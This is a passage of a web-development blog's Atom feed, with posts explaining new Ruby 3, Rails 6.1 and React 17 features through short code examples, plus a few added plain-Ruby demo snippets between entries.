src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/cloudfront-dashboard.png" alt="Cloudfront dashboard"></p></li><li><p>In the Heroku dashboard add the environment variable in your app.<img src="/blog_images/2020/using-cloudfront-cdn-to-reduce-asset-delivery-time-from-30-seconds-to-3-seconds/heroku-env-variable.png" alt="Setting environment variable"></p></li></ol><h2>Result</h2><p>Serving time of <code>application.js</code> on a cold load (not cached in browser) dropped from 30 seconds to 2-3 seconds.</p>]]></content>
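The cache-miss/cache-hit flow described in the post can be modelled with a few lines of plain Ruby. This is only an illustrative toy sketch (the `fetch` lambda and path are invented for the example), not Cloudfront's actual behaviour:

```ruby
# Toy model of CDN caching: the request path is the key, the asset is the value.
cache = {}
origin_hits = 0

fetch = lambda do |path|
  cache.fetch(path) do
    origin_hits += 1                   # cache miss: forward to the origin
    cache[path] = "asset for #{path}"  # store the origin's response
  end
end

fetch.call("/images/peter.jpg") # first request: miss, goes to origin
fetch.call("/images/peter.jpg") # second request: hit, served from cache
puts origin_hits
```

Fingerprinted asset names work because a new deploy produces a new key, so the stale value is simply never looked up again.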
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds values_at attribute method for Active Record]]></title>
       <author><name>Chetan Gawai</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-values_at-attribute-method-for-active-record"/>
      <updated>2020-11-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-values_at-attribute-method-for-active-record</id>
      <content type="html"><![CDATA[<p>Rails 6.1 simplifies retrieving values of attributes on an Active Record model instance by adding the <code>values_at</code> attribute method. This is similar to the <code>values_at</code> method in <code>Hash</code> and <code>Array</code>.</p><p>Let's check out an example of extracting values from a <code>User</code> model instance.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  def full_name
    &quot;#{self.first_name} #{self.last_name}&quot;
  end
end

&gt;&gt; user = User.new(first_name: 'Era', last_name: 'Das', email: 'era@gmail.com')
=&gt; User id: nil, first_name: &quot;Era&quot;, last_name: &quot;Das&quot;, created_at: nil, updated_at: nil, email: &quot;era@gmail.com&quot;, password_digest: nil</code></pre><h4>Before Rails 6.1</h4><p>As shown below, using <code>values_at</code> for <code>full_name</code>, which is a method, returns <code>nil</code>.</p><pre><code class="language-ruby">&gt;&gt; user.attributes.values_at(&quot;first_name&quot;, &quot;full_name&quot;)
=&gt; [&quot;Era&quot;, nil]</code></pre><h4>After changes in Rails 6.1</h4><p>Rails 6.1 added the <code>values_at</code> method on Active Record, which returns an array containing the values associated with the given methods.</p><pre><code class="language-ruby">&gt;&gt; user.values_at(&quot;first_name&quot;, &quot;full_name&quot;)
=&gt; [&quot;Era&quot;, &quot;Era Das&quot;]</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/36481">pull request</a> for more details.</p>]]></content>
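The new Active Record method mirrors the plain-Ruby `Hash#values_at` it is named after. This standalone snippet, using a plain hash in place of a real model, shows the "before" behaviour the post describes:

```ruby
# Hash#values_at returns the values for the given keys, in order;
# a key with no entry yields nil, just like user.attributes did for full_name.
attributes = { "first_name" => "Era", "last_name" => "Das" }
values = attributes.values_at("first_name", "full_name")
puts values.inspect
```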
    </entry><entry>
       <title><![CDATA[Ruby 3 adds new method Hash#except]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-adds-new-method-hash-except"/>
      <updated>2020-11-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-adds-new-method-hash-except</id>
      <content type="html"><![CDATA[<p>Ruby 3 adds a new method, <code>except</code>, to the Hash class. <code>Hash#except</code> returns a hash excluding the given keys and their values.</p><h3>Why do we need Hash#except?</h3><p>At times, we need to print or log everything except some sensitive data. Let's say we want to print user details in the logs but not passwords.</p><p>Before Ruby 3, we could have achieved it in the following ways:</p><pre><code class="language-ruby">irb(main):001:0&gt; user_details = { name: 'Akhil', age: 25, address: 'India', password: 'T:%g6R' }

# 1. Reject the key with a block
irb(main):003:0&gt; puts user_details.reject { |key, _| key == :password }
=&gt; { name: 'Akhil', age: 25, address: 'India' }

# 2. Clone the hash with dup, tap into it and delete that key/value from the clone
irb(main):005:0&gt; puts user_details.dup.tap { |hash| hash.delete(:password) }
=&gt; { name: 'Akhil', age: 25, address: 'India' }</code></pre><p>We know that ActiveSupport already comes with <code>Hash#except</code>, but for a simple Ruby application using ActiveSupport would be overkill.</p><h3>Ruby 3</h3><p>To make the above task easier and more explicit, Ruby 3 adds <code>Hash#except</code> to return a hash excluding the given keys and their values:</p><pre><code class="language-ruby">irb(main):001:0&gt; user_details = { name: 'Akhil', age: 25, address: 'India', password: 'T:%g6R' }
irb(main):002:0&gt; puts user_details.except(:password)
=&gt; { name: 'Akhil', age: 25, address: 'India' }
irb(main):003:0&gt; db_info = YAML.safe_load(File.read('./database.yml'))
irb(main):004:0&gt; puts db_info.except(:username, :password)
=&gt; { port: 5432, database_name: 'example_db_production' }</code></pre><p>Check out the <a href="https://github.com/ruby/ruby/commit/82ca8c73034b0a522fd2970ea39edfcd801955fe">commit</a> for more details. Discussion around it can be found <a href="https://bugs.ruby-lang.org/issues/15822">here</a>.</p>]]></content>
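For completeness, here is a self-contained script comparing the pre-3.0 workaround with `Hash#except` on the same sample hash (requires Ruby 3.0 or later):

```ruby
user_details = { name: 'Akhil', age: 25, address: 'India', password: 'T:%g6R' }

# Pre-3.0 workaround: reject the sensitive key with a block
filtered = user_details.reject { |key, _| key == :password }

# Ruby 3: Hash#except does the same thing, more explicitly
safe = user_details.except(:password)

puts safe.inspect
```

Note that both approaches return a new hash; the original `user_details` keeps its `:password` entry.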
    </entry><entry>
       <title><![CDATA[Database tasks can skip test database using SKIP_TEST_DATABASE]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/database-tasks-can-skip_test_database-with-an-environment-variable"/>
      <updated>2020-10-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/database-tasks-can-skip_test_database-with-an-environment-variable</id>
      <content type="html"><![CDATA[<p>In Rails 6.1, Rails will skip modifications to the test database if <code>SKIP_TEST_DATABASE</code> is set to <code>true</code>.</p><h2>Without the environment variable</h2><pre><code class="language-bash">&gt; bundle exec rake db:create
Created database 'app_name_development'
Created database 'app_name_test'</code></pre><h2>With the environment variable</h2><pre><code class="language-bash">&gt; SKIP_TEST_DATABASE=true bundle exec rake db:create
Created database 'app_name_development'</code></pre><p>As we can see in the first example, both a <code>development</code> and a <code>test</code> database were created, which is unexpected when directly invoking <code>db:create</code>. One obvious solution to this problem is to force the <code>development</code> environment to only create a <code>development</code> database. However, this solution will break <code>bin/setup</code> as mentioned in <a href="https://github.com/rails/rails/commit/6ca9031ba3c389f71366c3e6abf069c6924c5acf">this commit</a>. Hence the need for an environment variable to skip <code>test</code> database creation.</p><p>Check out the <a href="https://github.com/rails/rails/pull/39027">pull request</a> for more details.</p>]]></content>
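The effect of the flag can be pictured with a small plain-Ruby sketch. `target_environments` here is a hypothetical helper written for illustration, not Rails' actual implementation, which lives inside the database rake tasks:

```ruby
# Sketch of an env-var guard like SKIP_TEST_DATABASE: drop the test
# database from the list of databases a task would act on.
def target_environments(env)
  environments = ["development", "test"]
  environments.delete("test") if env["SKIP_TEST_DATABASE"] == "true"
  environments
end

puts target_environments({}).inspect
puts target_environments({ "SKIP_TEST_DATABASE" => "true" }).inspect
```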
    </entry><entry>
       <title><![CDATA[Rails 6.1 supports ORDER BY clause for batch processing methods]]></title>
       <author><name>Sagar Patil</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-supports-order-desc-for-find_each-find_in_batches-and-in_batches"/>
      <updated>2020-10-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-supports-order-desc-for-find_each-find_in_batches-and-in_batches</id>
      <content type="html"><![CDATA[<p>Before Rails 6.1, batch processing methods like <em>find_each</em>, <em>find_in_batches</em> and <em>in_batches</em> didn't support the <em>ORDER BY</em> clause. By default the order was set to <em>id ASC</em>.</p><pre><code class="language-ruby">&gt; User.find_each { |user| puts user.inspect }
User Load (0.4ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1000]]</code></pre><p>Rails 6.1 now supports <em>ORDER BY id</em> for ActiveRecord batch processing methods like <em>find_each</em>, <em>find_in_batches</em>, and <em>in_batches</em>. This allows us to retrieve the records in ascending or descending order of <em>ID</em>.</p><pre><code class="language-ruby">&gt; User.find_each(order: :desc) { |user| puts user.inspect }
User Load (0.4ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT ?  [[&quot;LIMIT&quot;, 1000]]</code></pre><pre><code class="language-ruby">&gt; User.find_in_batches(order: :desc) do |users|
&gt;   users.each do |user|
&gt;     puts user.inspect
&gt;   end
&gt; end
User Load (0.3ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT ?  [[&quot;LIMIT&quot;, 1000]]</code></pre><pre><code class="language-ruby">&gt; User.in_batches(order: :desc) do |users|
&gt;   users.each do |user|
&gt;     puts user.inspect
&gt;   end
&gt; end
(0.2ms)  SELECT &quot;users&quot;.&quot;id&quot; FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT ?  [[&quot;LIMIT&quot;, 1000]]
User Load (0.2ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 101]]</code></pre><p>Points to remember:</p><ul><li>The <em>ORDER BY</em> clause only works with the primary key column.</li><li>Valid values for the <em>ORDER BY</em> clause are <em>[:asc, :desc]</em> and they are case sensitive. If we use caps or title case (like <em>DESC</em> or <em>Asc</em>) then we'll get an <em>ArgumentError</em> as shown below.</li></ul><pre><code class="language-ruby">&gt; User.find_in_batches(order: :DESC) do |users|
&gt;   users.each do |user|
&gt;     puts user.inspect
&gt;   end
&gt; end
Traceback (most recent call last):
        2: from (irb):5
        1: from (irb):6:in `rescue in irb_binding'
ArgumentError (unknown keyword: :order)</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/30590">pull request</a> for more details.</p>]]></content>
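Outside of Active Record, the effect of `order: :desc` is simply "sort by primary key descending, then slice into batches". This plain-Ruby sketch, with hashes standing in for records and an invented batch size of 2, illustrates that:

```ruby
# Records represented as hashes; batch size of 2, descending id order.
records = (1..5).map { |i| { id: i } }
batches = records.sort_by { |r| -r[:id] }.each_slice(2).to_a

batches.each { |batch| puts batch.map { |r| r[:id] }.inspect }
```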
    </entry><entry>
       <title><![CDATA[Ruby 3 adds Symbol#name]]></title>
       <author><name>Datt Dongare</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-adds-symbol-name"/>
      <updated>2020-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-adds-symbol-name</id>
      <content type="html"><![CDATA[<p>All are excited about what <code>Ruby 3.0</code> has to offer to Ruby developers. There is already a lot of buzz that the feature set of <code>Ruby 3.0</code> will change how developers look at <code>Ruby</code>.</p><p>One of the important aspects of <code>Ruby 3.0</code> is optimization. Part of that optimization is the introduction of the <code>name</code> method for <code>Symbol</code>. In this blog, we will take a look at what the <code>name</code> method of class <code>Symbol</code> does and why it was introduced. The new <code>name</code> method simply converts a symbol into a string. <code>Symbol#name</code> returns a string. Let's see how it works.</p><pre><code class="language-ruby">irb(main):001:0&gt; :simba.name
=&gt; 'simba'
irb(main):002:0&gt; :simba.name.class
=&gt; String
irb(main):003:0&gt; :simba.name === :simba.name
=&gt; true</code></pre><p>Wait, what? Don't we already have <code>to_s</code> to convert a symbol into a string? Most of us have used the <code>to_s</code> method on a <code>Symbol</code>. The <code>to_s</code> method returns a <code>String</code> object and we can simply use it. So why <code>name</code>?</p><p>Using <code>to_s</code> is okay in most cases. But the problem with <code>to_s</code> is that it creates a new <code>String</code> object every time we call it on a symbol. We can verify this in <code>irb</code>.</p><pre><code class="language-ruby">irb(main):023:0&gt; :simba.to_s.object_id
=&gt; 260
irb(main):024:0&gt; :simba.to_s.object_id
=&gt; 280</code></pre><p>Creating a new object for every <code>symbol</code> to <code>string</code> conversion allocates new memory, which increases overhead. This issue was highlighted by <a href="https://bugs.ruby-lang.org/users/6346">schneems (Richard Schneeman)</a> in a talk at RubyConf Thailand, where he showed how <code>Symbol#to_s</code> allocation causes significant overhead in <code>ActiveRecord</code>. This inspired the <code>Ruby</code> community to add a new method, <code>name</code>, on <code>Symbol</code>, which returns a <code>frozen string</code> object. This reduces the string allocations dramatically, which results in reduced overhead.</p><pre><code class="language-ruby">irb(main):001:0&gt; :simba.name.frozen?
=&gt; true
irb(main):002:0&gt; :simba.name.object_id
=&gt; 200
irb(main):003:0&gt; :simba.name.object_id
=&gt; 200</code></pre><p>The reason to bring in this feature was that most of the time we want a simple string representation for display purposes or to interpolate into another string. The result of <code>to_s</code> is rarely mutated directly. By introducing this method we save a lot of objects, which helps in optimization. Now that we know the benefits of <code>name</code>, we should prefer using <code>name</code> over <code>to_s</code> when we don't want to mutate the string.</p><p>For more information, please head on to the <a href="https://bugs.ruby-lang.org/issues/16150">Feature #16150</a> discussion, the <a href="https://github.com/ruby/ruby/pull/3514">pull request</a> and the <a href="https://www.ruby-lang.org/en/news/2020/09/25/ruby-3-0-0-preview1-released/">Ruby 3.0 official release preview</a>.</p>]]></content>
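The memoization described above can be checked directly as a standalone script (requires Ruby 3.0 or later):

```ruby
# Symbol#name returns a frozen string and the same object on every call;
# Symbol#to_s allocates a fresh mutable string each time.
a = :simba.name
b = :simba.name
c = :simba.to_s
d = :simba.to_s

puts a.frozen?    # name is frozen
puts a.equal?(b)  # same object both times
puts c.equal?(d)  # to_s allocates a new object each call
```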
    </entry><entry>
       <title><![CDATA[React 17 delegates events to root instead of document]]></title>
       <author><name>Chetan Gawai</name></author>
      <link href="https://www.bigbinary.com/blog/react-17-delegates-events-to-root-instead-of-document"/>
      <updated>2020-09-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-17-delegates-events-to-root-instead-of-document</id>
      <content type="html"><![CDATA[<p>React has been doing <a href="https://davidwalsh.name/event-delegate">event delegation</a> automatically since its first release. It attaches one handler per event type directly at the <code>document</code> node.</p><p>Though it improves the performance of an application, <a href="https://github.com/facebook/react/issues/13451">many</a> <a href="https://github.com/facebook/react/issues/4335">issues</a> <a href="https://github.com/facebook/react/pull/8117">have been</a> <a href="https://github.com/facebook/react/issues/285#issuecomment-253502585">reported</a> due to the event delegation on the <code>document</code> node.</p><p>To demonstrate one of the issues, let's take an example of a select dropdown.</p><p><code>CountryDropDown</code> in the below example is a React component for country selection, which would be rendered to a div with id <code>react-root</code>. The React DOM container is wrapped inside a div with id <code>main</code> whose <code>change</code> event handler calls <code>stopPropagation()</code>.</p><pre><code class="language-html">&lt;!-- Div whose change event handler calls stopPropagation() --&gt;
&lt;div id=&quot;main&quot;&gt;
  &lt;!-- Div where the React component will be rendered --&gt;
  &lt;div id=&quot;react-root&quot;&gt;&lt;/div&gt;
&lt;/div&gt;</code></pre><pre><code class="language-javascript">class CountryDropDown extends React.Component {
  state = {
    country: '',
  };

  handleChange = e =&gt; {
    this.setState({ country: e.target.value });
  };

  render() {
    return (
      &lt;table className=&quot;table table-striped table-condensed&quot;&gt;
        &lt;thead&gt;
          &lt;tr&gt;
            &lt;th&gt;Country&lt;/th&gt;
            &lt;th&gt;Selected country&lt;/th&gt;
          &lt;/tr&gt;
        &lt;/thead&gt;
        &lt;tbody&gt;
          &lt;tr&gt;
            &lt;td&gt;
              &lt;select value={this.state.country} onChange={this.handleChange}&gt;
                &lt;option value=&quot;&quot;&gt;--Select--&lt;/option&gt;
                &lt;option value=&quot;India&quot;&gt;India&lt;/option&gt;
                &lt;option value=&quot;US&quot;&gt;US&lt;/option&gt;
                &lt;option value=&quot;Dubai&quot;&gt;Dubai&lt;/option&gt;
              &lt;/select&gt;
            &lt;/td&gt;
            &lt;td&gt;
              {this.state.country}
            &lt;/td&gt;
          &lt;/tr&gt;
        &lt;/tbody&gt;
      &lt;/table&gt;
    );
  }
}

ReactDOM.render(&lt;CountryDropDown /&gt;, document.getElementById('react-root'));</code></pre><p>Attaching the change event to the main div:</p><pre><code class="language-javascript">document.getElementById(&quot;main&quot;).addEventListener(
  &quot;change&quot;,
  function (e) {
    e.stopPropagation();
  },
  false
);</code></pre><p>When a country is selected, we cannot see the selected country. Watch this video to see it in action.</p><p><iframe width="100%" height="315" src="https://www.youtube.com/embed/6BgfvUz_3JM" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><p>The reason for this unexpected behavior is that the <code>onChange</code> event of the dropdown is attached to the <code>document</code> node. The <code>change</code> handler of the <code>main</code> div calling <code>e.stopPropagation()</code> prevents the dropdown's <code>onChange</code> event from firing.</p><p>To fix such issues, React 17 no longer attaches event handlers at the document level. Instead, it attaches them to the root DOM container into which the React tree is rendered.</p><p><img src="/blog_images/2020/react-17-delegates-events-to-root-instead-of-document/react_17_event_delegation.png" alt="event delegation"></p><p>Image is taken from the <a href="https://reactjs.org/blog/2020/08/10/react-v17-rc.html">React 17 blog</a>.</p><h2>Changes in React 17</h2><p>After the changes in React 17, events are attached to the root DOM container into which the React tree is rendered. In our example, the <code>onChange</code> event of the dropdown would be attached to the div with id <code>react-root</code>. This event would be triggered when any country is selected, restoring the expected behavior.</p><p><iframe width="100%" height="315" src="https://www.youtube.com/embed/6BgfvUz_3JM" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><h2>Note</h2><p>The React 17 release candidate can be installed from <a href="https://reactjs.org/blog/2020/08/10/react-v17-rc.html#installation">here</a>.</p><p>Check out the earlier discussion on event delegation <a href="https://github.com/facebook/react/issues/13525">here</a> and the pull request <a href="https://github.com/facebook/react/pull/18195">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 deprecates structure:dump/load rake tasks]]></title>
       <author><name>Chetan Gawai</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-deprecates-rails-db-structure-dump"/>
      <updated>2020-09-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-deprecates-rails-db-structure-dump</id>
      <content type="html"><![CDATA[<p>Rails 6.1 <a href="https://github.com/rails/rails/pull/39470">deprecates</a> the <code>rails db:structure:load</code> and <code>rails db:structure:dump</code> tasks.</p><p>Before Rails 6.1, executing <code>rake db:schema:dump</code> would dump the <code>db/schema.rb</code> file, and executing <code>rake db:structure:dump</code> would dump the <code>db/structure.sql</code> file.</p><p>Rails provides the <code>config.active_record.schema_format</code> setting, for which the valid values are <code>:ruby</code> or <code>:sql</code>. However, since there were specific tasks for <code>db:structure</code> and <code>db:schema</code>, this value was not really being used.</p><h4>Changes in Rails 6.1</h4><p>In Rails 6.1 the Rails team decided to combine the two different tasks into a single task. <code>rails db:structure:dump</code> and <code>rails db:structure:load</code> have been deprecated and the following message would be shown.</p><pre><code class="language-ruby">Using `bin/rails db:structure:dump` is deprecated and will be removed in Rails 6.2. Configure the format using `config.active_record.schema_format = :sql` to use `structure.sql` and run `bin/rails db:schema:dump` instead.</code></pre><p>Now Rails will start taking into account the value set for <code>config.active_record.schema_format</code>.</p><p><code>rails db:schema:dump</code> and <code>rails db:schema:load</code> will do the right thing based on the value set for <code>config.active_record.schema_format</code>.</p><p>Check out the <a href="https://github.com/rails/rails/pull/39470">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3 adds endless method definition]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-adds-endless-method-definition"/>
      <updated>2020-09-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-adds-endless-method-definition</id>
      <content type="html"><![CDATA[<p>Ruby 3.0 adds endless method definition. It enables us to create method definitions without the need for the <code>end</code> keyword. It is marked as an experimental feature.</p><pre><code class="language-ruby"># endless method definition
&gt;&gt; def raise_to_power(number, power) = number ** power
&gt;&gt; raise_to_power(2, 5)
=&gt; 32</code></pre><p>The discussion around it can be found <a href="https://bugs.ruby-lang.org/issues/16746">here</a>. Check out the <a href="https://github.com/ruby/ruby/pull/2996/files">pull request</a> for more details.</p>]]></content>
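The snippet above can also be run as a standalone script (Ruby 3.0 or later); `area` is an extra hypothetical example added here to show the one-line form alongside a call site:

```ruby
# Endless method definitions: the body follows `=`, no `end` keyword needed.
def raise_to_power(number, power) = number ** power
def area(length, width) = length * width

puts raise_to_power(2, 5)  # 32
puts area(3, 4)            # 12
```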
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds --minimal option support]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-minimal-option-support"/>
      <updated>2020-09-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-minimal-option-support</id>
      <content type="html"><![CDATA[<p><code>rails new my_app</code> creates a new Rails application fully loaded with all the features.</p><p>If we wanted to omit some of the features, we had to skip each of them like this.</p><pre><code class="language-bash"># before Rails 6.1
$ rails new tiny_app \
    --skip-action-cable \
    --skip-action-mailer \
    --skip-action-mailbox \
    --skip-action-text \
    --skip-active-storage \
    --skip-bootsnap \
    --skip-javascript \
    --skip-spring \
    --skip-system-test \
    --skip-webpack-install \
    --skip-turbolinks</code></pre><p>Before Rails 6.1 it was not possible to skip things like <code>active_job</code> and <code>jbuilder</code>.</p><h2>Rails 6.1</h2><p>Rails 6.1 added a new option, <code>--minimal</code>.</p><pre><code class="language-bash">$ rails new tiny_app --minimal</code></pre><p>All of the following are excluded from this minimal Rails application.</p><ul><li>action_cable</li><li>action_mailbox</li><li>action_mailer</li><li>action_text</li><li>active_job</li><li>active_storage</li><li>bootsnap</li><li>jbuilder</li><li>spring</li><li>system_tests</li><li>turbolinks</li><li>webpack</li></ul><p>We can bundle webpack in this minimal app like this.</p><pre><code class="language-bash">$ rails new tiny_app --minimal --webpack=react</code></pre><p>A database option can also be passed.</p><pre><code class="language-bash">$ rails new tiny_app --minimal --database postgresql --webpack=react</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/39282">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds support to persist timezones of Active Job]]></title>
       <author><name>Chetan Gawai</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-add-timezone-support-in-active-job"/>
      <updated>2020-09-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-add-timezone-support-in-active-job</id>
      <content type="html"><![CDATA[<p>When a job is enqueued in Rails 6 using Active Job, the current timezone of the job is <a href="https://github.com/rails/rails/pull/32085/">preserved</a>, and this preserved timezone is restored when the job is executed.</p><p>Let's take the example of a sale at Amazon.</p><p>Amazon would like to remind users across different timezones about its upcoming sale by sending an email. This task of sending a reminder would be processed as a background job.</p><p><b>Before:</b></p><p>Before Rails 6, we had to pass the timezone explicitly to the <code>perform</code> method of the job as shown below.</p><pre><code class="language-ruby">timezone = &quot;Eastern Time (US &amp; Canada)&quot;
AmazonSaleJob.perform_later(Time.now, timezone)

class AmazonSaleJob &lt; ApplicationJob
  queue_as :default

  def perform(time, timezone)
    time = time.in_time_zone(timezone)
    sale_start_time = localtime(2020, 12, 24)
    if time &gt;= sale_start_time
      puts &quot;Sale has started!&quot;
      # Send an email stating the sale has started
    else
      sale_starts_in = (sale_start_time - time).div(3600)
      puts &quot;Hang on! Sale will start in #{sale_starts_in} hours&quot;
      # Send an email stating the sale starts in sale_starts_in hours
    end
  end

  private

    def localtime(*args)
      Time.zone ? Time.zone.local(*args) : Time.utc(*args)
    end
end</code></pre><p><b>After:</b></p><p>After the changes in Rails 6, passing the timezone to the job is taken care of by Rails.</p><pre><code class="language-ruby">timezone = &quot;Eastern Time (US &amp; Canada)&quot;
Time.use_zone(timezone) do
  AmazonSaleJob.perform_later(Time.zone.now)
end

class AmazonSaleJob &lt; ApplicationJob
  queue_as :default

  def perform(time)
    sale_start_time = localtime(2020, 12, 24)
    if time &gt;= sale_start_time
      puts &quot;Sale has started!&quot;
      # Send an email stating the sale has started
    else
      sale_starts_in = (sale_start_time - time).div(3600)
      puts &quot;Hang on! Sale will start in #{sale_starts_in} hours&quot;
      # Send an email stating the sale starts in sale_starts_in hours
    end
  end

  private

    def localtime(*args)
      Time.zone ? Time.zone.local(*args) : Time.utc(*args)
    end
end</code></pre><p>Rails 6 also propagates the timezone to all subsequent nested jobs.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.7 adds Beginless Range]]></title>
       <author><name>Ashwath Biradar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-7-adds-beginless-range"/>
      <updated>2020-08-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-7-adds-beginless-range</id>
      <content type="html"><![CDATA[<p>Ruby 2.7 added support for <a href="https://ruby-doc.org/core-2.7.0/Range.html#class-Range-label-Beginless-2FEndless+Ranges">Beginless Range</a>, which makes the start of a range an optional parameter.</p><p><code>(..100)</code> is a Beginless Range and it is equivalent to <code>(nil..100)</code>.</p><p>Let's see how Beginless Range could be used.</p><pre><code class="language-ruby">&gt; array = (1..10).to_a

# Select first 6 elements
&gt; array[..5]
=&gt; [1, 2, 3, 4, 5, 6]

# Select first 5 elements
&gt; array[...5]
=&gt; [1, 2, 3, 4, 5]

# grep (-INFINITY..5) in (1..10)
&gt; (1..10).grep(..5)
=&gt; [1, 2, 3, 4, 5]

# (..100) is equivalent to (nil..100)
&gt; (..100) == (nil..100)
=&gt; true</code></pre><p>Here is another example where, in the <code>case</code> statement, the condition can be read as <code>below the specified level</code>.</p><pre><code class="language-ruby">case temperature
when ..-15
  puts &quot;Deep Freeze&quot;
when -15..8
  puts &quot;Refrigerator&quot;
when 8..15
  puts &quot;Cold&quot;
when 15..25
  puts &quot;Room Temperature&quot;
when (25..)   # Note the parentheses here
  puts &quot;Hot&quot;
end</code></pre><p>It can also be used for defining constants for ranges.</p><pre><code class="language-ruby">TEMPERATURE = {
  (..-15) =&gt; :deep_freeze,
  -15..8  =&gt; :refrigerator,
  8..15   =&gt; :cold,
  15..25  =&gt; :room_temperature,
  (25..)  =&gt; :hot
}</code></pre><p>Using Beginless Range in DSLs makes it easier to write conditions and looks more natural.</p><pre><code class="language-ruby"># In Rails
User.where(created_at: (..DateTime.now))
# User Load (2.2ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;created_at&quot; &lt;= $1 LIMIT $2  [[&quot;created_at&quot;, &quot;2020-08-05 15:00:19.111217&quot;], [&quot;LIMIT&quot;, 11]]

# In RubySpec
ruby_version(..'1.9') do
  # Tests for old Ruby
end</code></pre><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/95f7992b89efd35de6b28ac095c4d3477019c583">commit</a> and <a href="https://bugs.ruby-lang.org/issues/14799">discussion</a> regarding this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds including & excluding methods on Enumerables]]></title>
       <author><name>Akhil Gautam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-array-including-excluding-and-enumerable-including-excluding"/>
      <updated>2020-08-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-array-including-excluding-and-enumerable-including-excluding</id>
      <content type="html"><![CDATA[<p>Rails 6 added <code>including</code> and <code>excluding</code> on Array and Enumerable.</p><h4>Array#including and Enumerable#including</h4><p><code>including</code> can be used to extend a collection in a more object-oriented way. It does not mutate the original collection but returns a new collection which is the concatenation of the given collections.</p><pre><code class="language-ruby"># multiple arguments can be passed to including
&gt;&gt; [1, 2, 3].including(4, 5)
=&gt; [1, 2, 3, 4, 5]

# another enumerable can also be passed to including
&gt;&gt; [1, 2, 3].including([4, 5])
=&gt; [1, 2, 3, 4, 5]

&gt;&gt; %i(apple orange).including(:banana)
=&gt; [:apple, :orange, :banana]

# return customers whose country_code is IN along with the prime customers
&gt;&gt; Customer.where(country_code: &quot;IN&quot;).including(Customer.where(prime: true))</code></pre><h4>Array#excluding and Enumerable#excluding</h4><p><code>excluding</code> returns a copy of the enumerable excluding the given collection.</p><pre><code class="language-ruby"># a collection can be passed to excluding
&gt;&gt; [11, 22, 33, 44].excluding([22, 33])
=&gt; [11, 44]

&gt;&gt; %i(ant bat cat).excluding(:bat)
=&gt; [:ant, :cat]

# return all prime customers except those who haven't added their phone
&gt;&gt; Customer.where(prime: true).excluding(Customer.where(phone: nil))</code></pre><p><code>Array#excluding</code> and <code>Enumerable#excluding</code> replace the existing method <code>without</code>, which in Rails 6 is aliased to <code>excluding</code>.</p><pre><code class="language-ruby">&gt;&gt; [11, 22, 33, 44].without([22, 33])
=&gt; [11, 44]</code></pre><p><code>excluding</code> and <code>including</code> help to shrink or extend a collection without using any operator.</p><p>Check out the <a href="https://github.com/rails/rails/commit/bfaa3091c3c32b5980a614ef0f7b39cbf83f6db3">commit</a> for more details on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 raises error on rollback when using multiple databases]]></title>
       <author><name>Srijan Kapoor</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-raises-on-db-rollback-for-multiple-database-applications"/>
      <updated>2020-08-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-raises-on-db-rollback-for-multiple-database-applications</id>
